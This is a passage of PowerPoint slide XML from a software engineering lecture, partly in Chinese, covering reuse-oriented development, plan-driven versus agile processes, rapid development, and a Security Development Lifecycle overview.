                  <a:srgbClr val="46424D"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:ea typeface="Arial"/>
                <a:cs typeface="Arial"/>
                <a:sym typeface="Arial"/>
              </a:rPr>
              <a:t>Based on systematic reuse where systems are integrated from existing components or COTS (Commercial-off-the-shelf) systems.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr indent="-342900" lvl="0" marL="342900">
              <a:spcBef>
                <a:spcPts val="1200"/>
              </a:spcBef>
              <a:buClr>
                <a:srgbClr val="46424D"/>
              </a:buClr>
              <a:buSzPct val="100000"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-TW" sz="2400">
                <a:solidFill>
                  <a:srgbClr val="46424D"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:ea typeface="Arial"/>
                <a:cs typeface="Arial"/>
                <a:sym typeface="Arial"/>
              </a:rPr>
              <a:t>Process stages</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr indent="-285750" lvl="1" marL="742950">
              <a:spcBef>
                <a:spcPts val="900"/>
              </a:spcBef>
              <a:buClr>
                <a:srgbClr val="46424D"/>
              </a:buClr>
              <a:buSzPct val="100000"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-TW" sz="2000">
                <a:solidFill>
                  <a:srgbClr val="46424D"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:ea typeface="Arial"/>
                <a:cs typeface="Arial"/>
                <a:sym typeface="Arial"/>
              </a:rPr>
              <a:t>Component analysis;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr indent="-285750" lvl="1" marL="742950">
              <a:spcBef>
                <a:spcPts val="600"/>
              </a:spcBef>
              <a:buClr>
                <a:srgbClr val="46424D"/>
              </a:buClr>
              <a:buSzPct val="100000"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-TW" sz="2000">
                <a:solidFill>
                  <a:srgbClr val="46424D"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:ea typeface="Arial"/>
                <a:cs typeface="Arial"/>
                <a:sym typeface="Arial"/>
              </a:rPr>
              <a:t>Requirements modification;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr indent="-285750" lvl="1" marL="742950">
              <a:spcBef>
                <a:spcPts val="600"/>
              </a:spcBef>
              <a:buClr>
                <a:srgbClr val="46424D"/>
              </a:buClr>
              <a:buSzPct val="100000"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-TW" sz="2000">
                <a:solidFill>
                  <a:srgbClr val="46424D"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:ea typeface="Arial"/>
                <a:cs typeface="Arial"/>
                <a:sym typeface="Arial"/>
              </a:rPr>
              <a:t>System design with reuse;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr indent="-285750" lvl="1" marL="742950">
              <a:spcBef>
                <a:spcPts val="600"/>
              </a:spcBef>
              <a:buClr>
                <a:srgbClr val="46424D"/>
              </a:buClr>
              <a:buSzPct val="100000"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-TW" sz="2000">
                <a:solidFill>
                  <a:srgbClr val="46424D"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:ea typeface="Arial"/>
                <a:cs typeface="Arial"/>
                <a:sym typeface="Arial"/>
              </a:rPr>
              <a:t>Development and integration.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr indent="-342900" lvl="0" marL="342900">
              <a:spcBef>
                <a:spcPts val="900"/>
              </a:spcBef>
              <a:buClr>
                <a:srgbClr val="46424D"/>
              </a:buClr>
              <a:buSzPct val="100000"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-TW" sz="2400">
                <a:solidFill>
                  <a:srgbClr val="46424D"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:ea typeface="Arial"/>
                <a:cs typeface="Arial"/>
                <a:sym typeface="Arial"/>
              </a:rPr>
              <a:t>Reuse is now the standard approach for building many types of business system</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="171" name="Shape 171"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2123018" y="260351"/>
            <a:ext cx="10068900" cy="827100"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchorCtr="0" anchor="ctr" bIns="91425" lIns="91425" rIns="91425" tIns="91425">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr lvl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPct val="25000"/>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-TW" sz="2400">
                <a:solidFill>
                  <a:srgbClr val="46424D"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:ea typeface="Arial"/>
                <a:cs typeface="Arial"/>
                <a:sym typeface="Arial"/>
              </a:rPr>
              <a:t>Reuse-oriented software engineering</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="172" name="Shape 172"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="12" type="sldNum"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="9028607" y="6212160"/>
            <a:ext cx="2540100" cy="457200"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchorCtr="0" anchor="t" bIns="45700" lIns="91425" rIns="91425" tIns="45700">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr lvl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buClr>
                <a:srgbClr val="000000"/>
              </a:buClr>
              <a:buSzPct val="25000"/>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:fld id="{00000000-1234-1234-1234-123412341234}" type="slidenum">
              <a:rPr lang="zh-TW"/>
              <a:t>‹#›</a:t>
            </a:fld>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7" name="Shape 177"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="178" name="Shape 178"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3">
            <a:alphaModFix/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="2659725" y="1353200"/>
            <a:ext cx="7035800" cy="48387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3" name="Shape 183"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="184" name="Shape 184"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="1" type="body"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1200153" y="1484315"/>
            <a:ext cx="10367400" cy="4611600"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchorCtr="0" anchor="t" bIns="91425" lIns="91425" rIns="91425" tIns="91425">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr indent="-342900" lvl="0" marL="342900">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buClr>
                <a:srgbClr val="46424D"/>
              </a:buClr>
              <a:buSzPct val="100000"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-TW" sz="2400">
                <a:solidFill>
                  <a:srgbClr val="46424D"/>
                </a:solidFill>
                <a:highlight>
                  <a:srgbClr val="FFFF00"/>
                </a:highlight>
                <a:latin typeface="Arial"/>
                <a:ea typeface="Arial"/>
                <a:cs typeface="Arial"/>
                <a:sym typeface="Arial"/>
              </a:rPr>
              <a:t>Plan-driven</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" sz="2400">
                <a:solidFill>
                  <a:srgbClr val="46424D"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:ea typeface="Arial"/>
                <a:cs typeface="Arial"/>
                <a:sym typeface="Arial"/>
              </a:rPr>
              <a:t> processes are processes where all of the process activities are planned in advance and progress is measured against this plan. </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr indent="-342900" lvl="0" marL="342900">
              <a:spcBef>
                <a:spcPts val="1200"/>
              </a:spcBef>
              <a:buClr>
                <a:srgbClr val="46424D"/>
              </a:buClr>
              <a:buSzPct val="100000"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-TW" sz="2400">
                <a:solidFill>
                  <a:srgbClr val="46424D"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:ea typeface="Arial"/>
                <a:cs typeface="Arial"/>
                <a:sym typeface="Arial"/>
              </a:rPr>
              <a:t>In</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" sz="2400">
                <a:solidFill>
                  <a:srgbClr val="46424D"/>
                </a:solidFill>
                <a:highlight>
                  <a:srgbClr val="FFFF00"/>
                </a:highlight>
                <a:latin typeface="Arial"/>
                <a:ea typeface="Arial"/>
                <a:cs typeface="Arial"/>
                <a:sym typeface="Arial"/>
              </a:rPr>
              <a:t> agile processes</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" sz="2400">
                <a:solidFill>
                  <a:srgbClr val="46424D"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:ea typeface="Arial"/>
                <a:cs typeface="Arial"/>
                <a:sym typeface="Arial"/>
              </a:rPr>
              <a:t>, planning is incremental and it is easier to change the process to reflect changing customer requirements. </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr indent="-342900" lvl="0" marL="342900">
              <a:spcBef>
                <a:spcPts val="1200"/>
              </a:spcBef>
              <a:buClr>
                <a:srgbClr val="46424D"/>
              </a:buClr>
              <a:buSzPct val="100000"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-TW" sz="2400">
                <a:solidFill>
                  <a:srgbClr val="46424D"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:ea typeface="Arial"/>
                <a:cs typeface="Arial"/>
                <a:sym typeface="Arial"/>
              </a:rPr>
              <a:t>In practice, most practical processes include elements of both plan-driven and agile approaches. </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr indent="-342900" lvl="0" marL="342900">
              <a:spcBef>
                <a:spcPts val="1200"/>
              </a:spcBef>
              <a:buClr>
                <a:srgbClr val="46424D"/>
              </a:buClr>
              <a:buSzPct val="100000"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-TW" sz="2400">
                <a:solidFill>
                  <a:srgbClr val="46424D"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:ea typeface="Arial"/>
                <a:cs typeface="Arial"/>
                <a:sym typeface="Arial"/>
              </a:rPr>
              <a:t>There are no right or wrong software processes.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="185" name="Shape 185"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2123018" y="260351"/>
            <a:ext cx="10068900" cy="827100"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchorCtr="0" anchor="ctr" bIns="91425" lIns="91425" rIns="91425" tIns="91425">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr lvl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPct val="25000"/>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-TW" sz="2400">
                <a:solidFill>
                  <a:srgbClr val="46424D"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:ea typeface="Arial"/>
                <a:cs typeface="Arial"/>
                <a:sym typeface="Arial"/>
              </a:rPr>
              <a:t>Plan-driven and agile processes</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="186" name="Shape 186"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="12" type="sldNum"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="9028607" y="6212160"/>
            <a:ext cx="2540100" cy="457200"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchorCtr="0" anchor="t" bIns="45700" lIns="91425" rIns="91425" tIns="45700">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr lvl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buClr>
                <a:srgbClr val="000000"/>
              </a:buClr>
              <a:buSzPct val="25000"/>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:fld id="{00000000-1234-1234-1234-123412341234}" type="slidenum">
              <a:rPr lang="zh-TW"/>
              <a:t>‹#›</a:t>
            </a:fld>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1" name="Shape 191"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="192" name="Shape 192"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="1" type="body"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1200153" y="1484315"/>
            <a:ext cx="10367400" cy="4611600"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchorCtr="0" anchor="t" bIns="91425" lIns="91425" rIns="91425" tIns="91425">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr indent="-342900" lvl="0" marL="342900">
              <a:spcBef>
                <a:spcPts val="900"/>
              </a:spcBef>
              <a:buClr>
                <a:srgbClr val="46424D"/>
              </a:buClr>
              <a:buSzPct val="100000"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-TW" sz="2400">
                <a:solidFill>
                  <a:srgbClr val="46424D"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:ea typeface="Arial"/>
                <a:cs typeface="Arial"/>
                <a:sym typeface="Arial"/>
              </a:rPr>
              <a:t>Rapid software development</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr indent="-285750" lvl="1" marL="742950">
              <a:spcBef>
                <a:spcPts val="900"/>
              </a:spcBef>
              <a:buClr>
                <a:srgbClr val="46424D"/>
              </a:buClr>
              <a:buSzPct val="100000"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-TW" sz="2000">
                <a:solidFill>
                  <a:srgbClr val="46424D"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:ea typeface="Arial"/>
                <a:cs typeface="Arial"/>
                <a:sym typeface="Arial"/>
              </a:rPr>
              <a:t>Specification, design and implementation are inter-leaved</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr indent="-285750" lvl="1" marL="742950">
              <a:spcBef>
                <a:spcPts val="600"/>
              </a:spcBef>
              <a:buClr>
                <a:srgbClr val="46424D"/>
              </a:buClr>
              <a:buSzPct val="100000"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-TW" sz="2000">
                <a:solidFill>
                  <a:srgbClr val="46424D"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:ea typeface="Arial"/>
                <a:cs typeface="Arial"/>
                <a:sym typeface="Arial"/>
              </a:rPr>
              <a:t>System is developed as a series of versions with stakeholders involved in version evaluation</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr indent="-285750" lvl="1" marL="742950">
              <a:spcBef>
                <a:spcPts val="600"/>
              </a:spcBef>
              <a:buClr>
                <a:srgbClr val="46424D"/>
              </a:buClr>
              <a:buSzPct val="100000"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-TW" sz="2000">
                <a:solidFill>
                  <a:srgbClr val="46424D"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:ea typeface="Arial"/>
                <a:cs typeface="Arial"/>
                <a:sym typeface="Arial"/>
              </a:rPr>
              <a:t>User interfaces are often developed using an IDE and graphical toolset.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="193" name="Shape 193"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2123018" y="260351"/>
            <a:ext cx="10068900" cy="827100"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchorCtr="0" anchor="ctr" bIns="91425" lIns="91425" rIns="91425" tIns="91425">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr lvl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="194" name="Shape 194"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="12" type="sldNum"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="9028607" y="6212160"/>
            <a:ext cx="2540100" cy="457200"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchorCtr="0" anchor="t" bIns="45700" lIns="91425" rIns="91425" tIns="45700">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr lvl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buClr>
                <a:srgbClr val="000000"/>
              </a:buClr>
              <a:buSzPct val="25000"/>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:fld id="{00000000-1234-1234-1234-123412341234}" type="slidenum">
              <a:rPr lang="zh-TW"/>
              <a:t>‹#›</a:t>
            </a:fld>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9" name="Shape 199"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="200" name="Shape 200"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="1" type="body"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1200153" y="1484315"/>
            <a:ext cx="10367433" cy="4611686"/>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組織已體認安全程式碼(Secure Code)的重要與需求。</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr indent="-342891" lvl="0" marL="342891" marR="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="300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軟體安全議題應該在整個軟體開發流程中扮演重要角色。</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr indent="-342891" lvl="0" marL="342891" marR="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="300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一個良好的安全軟體開發生命週期應該在以下四個主要的階段皆要考慮安全的議題。</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需求階段 (Requirements phase)</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設計階段 (Design phase)</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程式開發階段 (Coding phase)</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測試階段 (Testing phase)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr indent="-342891" lvl="0" marL="342891" marR="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="560"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:srgbClr val="555DAB"/>
              </a:buClr>
              <a:buSzPct val="100000"/>
              <a:buFont typeface="Noto Sans Symbols"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr b="0" i="0" sz="2800" u="none" cap="none" strike="noStrike">
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
              <a:latin typeface="Trebuchet MS"/>
              <a:ea typeface="Trebuchet MS"/>
              <a:cs typeface="Trebuchet MS"/>
              <a:sym typeface="Trebuchet MS"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="201" name="Shape 201"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1703513" y="260351"/>
            <a:ext cx="10488490"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Security Development Lifecycle (SDL) Model</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="202" name="Shape 202"/>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b="0" i="0" lang="zh-TW" sz="1200" u="none" cap="none" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="003399"/>
                </a:solidFill>
                <a:latin typeface="Tahoma"/>
                <a:ea typeface="Tahoma"/>
                <a:cs typeface="Tahoma"/>
                <a:sym typeface="Tahoma"/>
              </a:rPr>
              <a:t>‹#›</a:t>
            </a:fld>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06" name="Shape 206"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="207" name="Shape 207"/>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b="0" i="0" lang="zh-TW" sz="1200" u="none" cap="none" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="003399"/>
                </a:solidFill>
                <a:latin typeface="Tahoma"/>
                <a:ea typeface="Tahoma"/>
                <a:cs typeface="Tahoma"/>
                <a:sym typeface="Tahoma"/>
              </a:rPr>
              <a:t>‹#›</a:t>
            </a:fld>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="208" name="Shape 208"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="243912" y="1772816"/>
            <a:ext cx="8948430" cy="1609327"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="FFEBEB"/>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Font typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr b="1" i="0" sz="1600" u="none" cap="none" strike="noStrike">
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
              <a:latin typeface="Times New Roman"/>
              <a:ea typeface="Times New Roman"/>
              <a:cs typeface="Times New Roman"/>
              <a:sym typeface="Times New Roman"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="209" name="Shape 209"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="272242" y="4221087"/>
            <a:ext cx="8920100" cy="1584175"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="CDE6FF"/>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Font typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr b="1" i="0" sz="1600" u="none" cap="none" strike="noStrike">
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
              <a:latin typeface="Times New Roman"/>
              <a:ea typeface="Times New Roman"/>
              <a:cs typeface="Times New Roman"/>
              <a:sym typeface="Times New Roman"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="210" name="Shape 210"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3071664" y="1772816"/>
            <a:ext cx="0" cy="1609327"/>
          </a:xfrm>
          <a:prstGeom prst="straightConnector1">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:schemeClr val="accent1"/>
          </a:solidFill>
          <a:ln cap="flat" cmpd="sng" w="9525">
            <a:solidFill>
              <a:schemeClr val="dk1"/>
            </a:solidFill>
            <a:prstDash val="solid"/>
            <a:round/>
            <a:headEnd len="med" w="med" type="none"/>
            <a:tailEnd len="med" w="med" type="none"/>
          </a:ln>
        </p:spPr>
      </p:cxnSp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="211" name="Shape 211"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4727848" y="1772816"/>
            <a:ext cx="0" cy="1609327"/>
          </a:xfrm>
          <a:prstGeom prst="straightConnector1">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:schemeClr val="accent1"/>
          </a:solidFill>
          <a:ln cap="flat" cmpd="sng" w="9525">
            <a:solidFill>
              <a:schemeClr val="dk1"/>
            </a:solidFill>
            <a:prstDash val="solid"/>
            <a:round/>
            <a:headEnd len="med" w="med" type="none"/>
            <a:tailEnd len="med" w="med" type="none"/>
          </a:ln>
        </p:spPr>
      </p:cxnSp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="212" name="Shape 212"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5879976" y="1804174"/>
            <a:ext cx="0" cy="1609327"/>
          </a:xfrm>
          <a:prstGeom prst="straightConnector1">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:schemeClr val="accent1"/>
          </a:solidFill>
          <a:ln cap="flat" cmpd="sng" w="9525">
            <a:solidFill>
              <a:schemeClr val="dk1"/>
            </a:solidFill>
            <a:prstDash val="solid"/>
            <a:round/>
            <a:headEnd len="med" w="med" type="none"/>
            <a:tailEnd len="med" w="med" type="none"/>
          </a:ln>
        </p:spPr>
      </p:cxnSp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="213" name="Shape 213"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7176120" y="1771091"/>
            <a:ext cx="0" cy="1609327"/>
          </a:xfrm>
          <a:prstGeom prst="straightConnector1">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:schemeClr val="accent1"/>
          </a:solidFill>
          <a:ln cap="flat" cmpd="sng" w="9525">
            <a:solidFill>
              <a:schemeClr val="dk1"/>
            </a:solidFill>
            <a:prstDash val="solid"/>
